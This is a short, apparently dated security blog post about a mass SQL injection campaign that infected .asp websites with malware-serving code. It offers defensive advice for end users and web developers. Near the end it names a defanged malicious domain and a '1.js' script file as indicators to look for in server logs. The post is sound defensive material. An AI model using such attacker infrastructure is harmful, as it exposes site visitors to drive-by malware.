We’ve been following this one for a few days now and have collected a couple of relevant informational sites hopefully to reduce the amount of time you have to spend researching this.

From washingtonpost.com “Hundreds of thousands of Web sites – including several at the United Nations and in the U.K. government — have been hacked recently and seeded with code that tries to exploit security flaws in Microsoft Windows to install malicious software on visitors’ machines.”

This is a SQL injection attack targeted primarily at .asp pages. There are two fronts to this battle. The users machine (risk of visiting an already infected site) web server (risk of being infected and used to spread malware/host attacks on visitors”)

This shouldn’t really be a surprise to anyone. We’ve been warned for a while now that web attacks were on the rise and that badly written code would be increasingly compromised so here you have it.
The tough part is that we cant just patch an OS and make this go away. It takes a skilled prog to deal with these vulnerabilities which most organizations don’t even know they have because most places don’t do much in the way of web app scans. I have a feeling many more will be learning about this the hard way in coming days/months.

My recommendations for an organization to start dealing with web app vulnerabilities?

1. Get off the IE habit wherever possible AND properly lock down Firefox.
2. Get your web dev staff to training from SANS on mitigating the OWASP top ten.
3. Hound your vendors for any .asp web apps you have purchased and are running and make them check their code.
4. Check the owasp site for web scan recommendations. This need to be part of any org’s vulnerability assessment and ongoing review programs.

The best place in my opinion to start is with the owasp.net website.

Exploit details from SANS:


For end users/support staff:

1. A properly-patched system should not be at-risk from this attack. By properly patched we mean updating not just the OS but applications like Real Player and Itunes as well.

2. We recommend using a browser that does not support ActiveX. By default Firefox does not support ActiveX. Use of javascript controls such as NoScript with Firefox are also effective (or just kill java and javascript in your preferences).

A good article on securing your browser:


For Web Programmers: Defending yourself from SQL attacks:


Microsoft’s guidelines regarding Protecting asp.net from SQL injection.


Also, SQL web service providers should review logs for any reference to www<.>nihaorr1<.>com which has been injecting the file “1.js”

Leave a Reply